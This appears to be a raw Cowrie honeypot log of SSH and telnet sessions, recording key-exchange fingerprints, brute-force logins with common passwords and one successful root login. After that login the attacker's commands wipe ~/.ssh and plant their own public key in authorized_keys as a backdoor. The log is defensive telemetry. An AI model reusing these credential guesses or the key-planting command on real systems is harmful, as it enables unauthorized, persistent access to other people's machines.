{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:24:43.301402Z","src_ip":"212.227.235.229","session":"ef017ca81470"}
{"eventid":"cowrie.login.failed","username":"ll","password":"ll","message":"login attempt [ll/ll] failed","sensor":"my-vps","timestamp":"2025-08-31T00:24:44.549775Z","src_ip":"212.227.235.229","session":"ef017ca81470"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:24:45.427160Z","src_ip":"212.227.125.160","session":"fa518c6a4052"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:24:45.853348Z","src_ip":"212.227.235.229","session":"ef017ca81470"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40688,"dst_ip":"1.2.3.4","dst_port":22,"session":"447dcc0918ae","protocol":"ssh","message":"New connection: 212.227.235.229:40688 (1.2.3.4:22) [session: 447dcc0918ae]","sensor":"my-vps","timestamp":"2025-08-31T00:25:20.622797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:25:21.450587Z","src_ip":"212.227.235.229","session":"447dcc0918ae"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:25:21.451329Z","src_ip":"212.227.235.229","session":"447dcc0918ae"}
{"eventid":"cowrie.login.failed","username":"admin","password":"welcome","message":"login attempt [admin/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T00:25:27.993647Z","src_ip":"212.227.235.229","session":"447dcc0918ae"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:25:29.995742Z","src_ip":"212.227.235.229","session":"447dcc0918ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58090,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c69cece81da","protocol":"ssh","message":"New connection: 212.227.235.229:58090 (1.2.3.4:22) [session: 8c69cece81da]","sensor":"my-vps","timestamp":"2025-08-31T00:25:41.935480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:25:41.936254Z","src_ip":"212.227.235.229","session":"8c69cece81da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:25:42.237768Z","src_ip":"212.227.235.229","session":"8c69cece81da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60242,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3ff8a5c89cf","protocol":"ssh","message":"New connection: 212.227.125.160:60242 (1.2.3.4:22) [session: b3ff8a5c89cf]","sensor":"my-vps","timestamp":"2025-08-31T00:25:42.623794Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:25:43.059047Z","src_ip":"212.227.125.160","session":"b3ff8a5c89cf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:25:43.210099Z","src_ip":"212.227.125.160","session":"b3ff8a5c89cf"}
{"eventid":"cowrie.login.failed","username":"glassfish","password":"1qaz2wsx","message":"login attempt [glassfish/1qaz2wsx] failed","sensor":"my-vps","timestamp":"2025-08-31T00:25:43.460708Z","src_ip":"212.227.235.229","session":"8c69cece81da"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:25:44.763804Z","src_ip":"212.227.235.229","session":"8c69cece81da"}
{"eventid":"cowrie.login.failed","username":"admin","password":"welcome","message":"login attempt [admin/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T00:25:45.944264Z","src_ip":"212.227.125.160","session":"b3ff8a5c89cf"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:25:47.527918Z","src_ip":"212.227.125.160","session":"b3ff8a5c89cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53572,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2b4fdf53c76","protocol":"ssh","message":"New connection: 212.227.235.229:53572 (1.2.3.4:22) [session: b2b4fdf53c76]","sensor":"my-vps","timestamp":"2025-08-31T00:26:23.615609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:26:24.684235Z","src_ip":"212.227.235.229","session":"b2b4fdf53c76"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:26:24.684888Z","src_ip":"212.227.235.229","session":"b2b4fdf53c76"}
{"eventid":"cowrie.login.failed","username":"admin","password":"abc123","message":"login attempt [admin/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:26:30.443245Z","src_ip":"212.227.235.229","session":"b2b4fdf53c76"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:26:32.409016Z","src_ip":"212.227.235.229","session":"b2b4fdf53c76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51948,"dst_ip":"1.2.3.4","dst_port":22,"session":"da7161736ac9","protocol":"ssh","message":"New connection: 212.227.235.229:51948 (1.2.3.4:22) [session: da7161736ac9]","sensor":"my-vps","timestamp":"2025-08-31T00:26:38.330557Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3322,"dst_ip":"1.2.3.4","dst_port":23,"session":"934d4f74806f","protocol":"telnet","message":"New connection: 212.227.235.229:3322 (1.2.3.4:23) [session: 934d4f74806f]","sensor":"my-vps","timestamp":"2025-08-31T00:26:38.870275Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46760,"dst_ip":"1.2.3.4","dst_port":22,"session":"63573db66a1b","protocol":"ssh","message":"New connection: 212.227.235.229:46760 (1.2.3.4:22) [session: 63573db66a1b]","sensor":"my-vps","timestamp":"2025-08-31T00:26:45.074466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:26:45.075170Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:26:45.383343Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.login.success","username":"root","password":"A@12345678","message":"login attempt [root/A@12345678] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:26:46.670084Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44872,"dst_ip":"1.2.3.4","dst_port":22,"session":"75038235624e","protocol":"ssh","message":"New connection: 212.227.125.160:44872 (1.2.3.4:22) [session: 75038235624e]","sensor":"my-vps","timestamp":"2025-08-31T00:26:47.274319Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:26:47.306372Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:26:47.307138Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:26:47.308350Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:26:47.617872Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:26:47.878399Z","src_ip":"212.227.125.160","session":"75038235624e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:26:47.879162Z","src_ip":"212.227.125.160","session":"75038235624e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:26:48.297980Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:26:48.298645Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:26:48.607615Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:26:48.608541Z","src_ip":"212.227.235.229","session":"63573db66a1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52570,"dst_ip":"1.2.3.4","dst_port":22,"session":"d116f793f740","protocol":"ssh","message":"New connection: 212.227.235.229:52570 (1.2.3.4:22) [session: d116f793f740]","sensor":"my-vps","timestamp":"2025-08-31T00:26:48.911144Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:26:48.911813Z","src_ip":"212.227.235.229","session":"d116f793f740"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:26:49.216403Z","src_ip":"212.227.235.229","session":"d116f793f740"}
{"eventid":"cowrie.login.failed","username":"admin","password":"abc123","message":"login attempt [admin/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:26:50.380533Z","src_ip":"212.227.125.160","session":"75038235624e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:26:50.476066Z","src_ip":"212.227.235.229","session":"d116f793f740"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:26:51.506028Z","src_ip":"212.227.125.160","session":"75038235624e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:26:51.782186Z","src_ip":"212.227.235.229","session":"d116f793f740"}
{"eventid":"cowrie.session.closed","duration":12.969515562057495,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:26:51.839690Z","src_ip":"212.227.235.229","session":"934d4f74806f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":4110,"dst_ip":"1.2.3.4","dst_port":23,"session":"3e3763579d67","protocol":"telnet","message":"New connection: 212.227.235.229:4110 (1.2.3.4:23) [session: 3e3763579d67]","sensor":"my-vps","timestamp":"2025-08-31T00:26:51.999893Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57268,"dst_ip":"1.2.3.4","dst_port":22,"session":"799d8106e29b","protocol":"ssh","message":"New connection: 212.227.235.229:57268 (1.2.3.4:22) [session: 799d8106e29b]","sensor":"my-vps","timestamp":"2025-08-31T00:26:53.076398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:26:53.077860Z","src_ip":"212.227.235.229","session":"799d8106e29b"}
